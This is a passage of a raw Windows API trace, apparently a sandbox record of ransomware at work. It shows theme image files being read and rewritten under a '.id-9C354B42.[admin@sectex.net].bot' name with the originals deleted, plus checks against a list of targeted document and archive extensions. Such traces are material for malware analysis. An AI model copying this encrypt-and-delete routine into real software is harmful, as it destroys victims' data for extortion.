	[0042.261] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.261] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0042.766] GetLastError () returned 0x0
	[0042.766] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xb20, lpOverlapped=0x0) returned 1
	[0042.768] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xb30, lpOverlapped=0x0) returned 1
	[0042.768] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.769] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0042.769] SetEndOfFile (hFile=0x1a0) returned 1
	[0042.769] CloseHandle (hObject=0x1a0) returned 1
	[0042.770] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.770] SetEndOfFile (hFile=0x1f8) returned 1
	[0042.770] CloseHandle (hObject=0x1f8) returned 1
	[0042.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.771] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 1
	[0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.771] lstrlenW (lpString=".doc") returned 4
	[0042.771] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.771] lstrlenW (lpString=".docx") returned 5
	[0042.771] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.771] lstrlenW (lpString=".pdf") returned 4
	[0042.771] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.771] lstrlenW (lpString=".xls") returned 4
	[0042.771] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.771] lstrlenW (lpString=".xlsx") returned 5
	[0042.771] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.771] lstrlenW (lpString=".ppt") returned 4
	[0042.771] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.771] lstrlenW (lpString=".zip") returned 4
	[0042.771] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.771] lstrlenW (lpString=".rar") returned 4
	[0042.771] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString=".bz2") returned 4
	[0042.772] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.772] lstrlenW (lpString=".7z") returned 3
	[0042.772] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.772] lstrlenW (lpString=".dbf") returned 4
	[0042.772] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.772] lstrlenW (lpString=".1cd") returned 4
	[0042.772] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.772] lstrlenW (lpString=".jpg") returned 4
	[0042.772] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.772] lstrlenW (lpString=".doc") returned 4
	[0042.772] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.772] lstrlenW (lpString=".docx") returned 5
	[0042.772] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.772] lstrlenW (lpString=".pdf") returned 4
	[0042.772] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString=".xls") returned 4
	[0042.772] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString=".xlsx") returned 5
	[0042.772] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.772] lstrlenW (lpString=".ppt") returned 4
	[0042.772] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.772] lstrlenW (lpString=".zip") returned 4
	[0042.772] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString=".rar") returned 4
	[0042.772] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.772] lstrlenW (lpString=".bz2") returned 4
	[0042.772] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.773] lstrlenW (lpString=".7z") returned 3
	[0042.773] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.773] lstrlenW (lpString=".dbf") returned 4
	[0042.773] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.773] lstrlenW (lpString=".1cd") returned 4
	[0042.773] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72
	[0042.773] lstrlenW (lpString=".jpg") returned 4
	[0042.773] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.773] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0042.773] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0042.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.892] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=20627) returned 1
	[0042.892] CloseHandle (hObject=0x1f8) returned 1
	[0042.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 0x20
	[0042.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.892] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.893] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0042.893] GetLastError () returned 0x0
	[0042.893] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x5093, lpOverlapped=0x0) returned 1
	[0042.895] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x50a0, lpOverlapped=0x0) returned 1
	[0042.896] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.896] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0042.896] SetEndOfFile (hFile=0x1a0) returned 1
	[0042.896] CloseHandle (hObject=0x1a0) returned 1
	[0042.897] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.897] SetEndOfFile (hFile=0x1f8) returned 1
	[0042.898] CloseHandle (hObject=0x1f8) returned 1
	[0042.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.898] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1
	[0042.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.898] lstrlenW (lpString=".doc") returned 4
	[0042.898] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0042.898] lstrlenW (lpString=".docx") returned 5
	[0042.898] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0042.899] lstrlenW (lpString=".pdf") returned 4
	[0042.899] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0042.899] lstrlenW (lpString=".xls") returned 4
	[0042.899] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0042.899] lstrlenW (lpString=".xlsx") returned 5
	[0042.899] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0042.899] lstrlenW (lpString=".ppt") returned 4
	[0042.899] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0042.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.899] lstrlenW (lpString=".zip") returned 4
	[0042.899] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0042.899] lstrlenW (lpString=".rar") returned 4
	[0042.899] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0042.899] lstrlenW (lpString=".bz2") returned 4
	[0042.899] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0042.899] lstrlenW (lpString=".7z") returned 3
	[0042.899] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0042.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.899] lstrlenW (lpString=".dbf") returned 4
	[0042.899] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0042.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.899] lstrlenW (lpString=".1cd") returned 4
	[0042.899] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0042.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.899] lstrlenW (lpString=".jpg") returned 4
	[0042.899] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0042.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.899] lstrlenW (lpString=".doc") returned 4
	[0042.899] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0042.899] lstrlenW (lpString=".docx") returned 5
	[0042.899] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0042.899] lstrlenW (lpString=".pdf") returned 4
	[0042.900] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0042.900] lstrlenW (lpString=".xls") returned 4
	[0042.900] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0042.900] lstrlenW (lpString=".xlsx") returned 5
	[0042.900] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0042.900] lstrlenW (lpString=".ppt") returned 4
	[0042.900] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0042.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.900] lstrlenW (lpString=".zip") returned 4
	[0042.900] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0042.900] lstrlenW (lpString=".rar") returned 4
	[0042.900] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0042.900] lstrlenW (lpString=".bz2") returned 4
	[0042.900] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0042.900] lstrlenW (lpString=".7z") returned 3
	[0042.900] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0042.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.900] lstrlenW (lpString=".dbf") returned 4
	[0042.900] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0042.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.900] lstrlenW (lpString=".1cd") returned 4
	[0042.900] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0042.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75
	[0042.900] lstrlenW (lpString=".jpg") returned 4
	[0042.900] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0042.900] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0042.900] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0042.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.901] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1560) returned 1
	[0042.901] CloseHandle (hObject=0x1f8) returned 1
	[0042.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 0x20
	[0042.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.901] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.901] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.901] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.901] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0042.903] GetLastError () returned 0x0
	[0042.903] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x618, lpOverlapped=0x0) returned 1
	[0042.904] WriteFile (in: hFile=0x200, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x620, lpOverlapped=0x0) returned 1
	[0042.905] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.905] WriteFile (in: hFile=0x200, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0042.905] SetEndOfFile (hFile=0x200) returned 1
	[0042.905] CloseHandle (hObject=0x200) returned 1
	[0042.906] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.906] SetEndOfFile (hFile=0x1f8) returned 1
	[0042.907] CloseHandle (hObject=0x1f8) returned 1
	[0042.907] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.907] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 1
	[0042.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.907] lstrlenW (lpString=".doc") returned 4
	[0042.907] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.907] lstrlenW (lpString=".docx") returned 5
	[0042.907] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.907] lstrlenW (lpString=".pdf") returned 4
	[0042.907] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.907] lstrlenW (lpString=".xls") returned 4
	[0042.907] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.907] lstrlenW (lpString=".xlsx") returned 5
	[0042.907] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.907] lstrlenW (lpString=".ppt") returned 4
	[0042.907] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString=".zip") returned 4
	[0042.908] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.908] lstrlenW (lpString=".rar") returned 4
	[0042.908] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.908] lstrlenW (lpString=".bz2") returned 4
	[0042.908] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.908] lstrlenW (lpString=".7z") returned 3
	[0042.908] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString=".dbf") returned 4
	[0042.908] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString=".1cd") returned 4
	[0042.908] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString=".jpg") returned 4
	[0042.908] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString=".doc") returned 4
	[0042.908] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.908] lstrlenW (lpString=".docx") returned 5
	[0042.908] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.908] lstrlenW (lpString=".pdf") returned 4
	[0042.908] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.908] lstrlenW (lpString=".xls") returned 4
	[0042.908] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.908] lstrlenW (lpString=".xlsx") returned 5
	[0042.908] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.908] lstrlenW (lpString=".ppt") returned 4
	[0042.908] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.908] lstrlenW (lpString=".zip") returned 4
	[0042.908] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.909] lstrlenW (lpString=".rar") returned 4
	[0042.909] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.909] lstrlenW (lpString=".bz2") returned 4
	[0042.909] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.909] lstrlenW (lpString=".7z") returned 3
	[0042.909] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.909] lstrlenW (lpString=".dbf") returned 4
	[0042.909] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.909] lstrlenW (lpString=".1cd") returned 4
	[0042.909] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76
	[0042.909] lstrlenW (lpString=".jpg") returned 4
	[0042.909] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.909] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0042.909] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0042.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.909] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=33009) returned 1
	[0042.909] CloseHandle (hObject=0x1f8) returned 1
	[0042.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 0x20
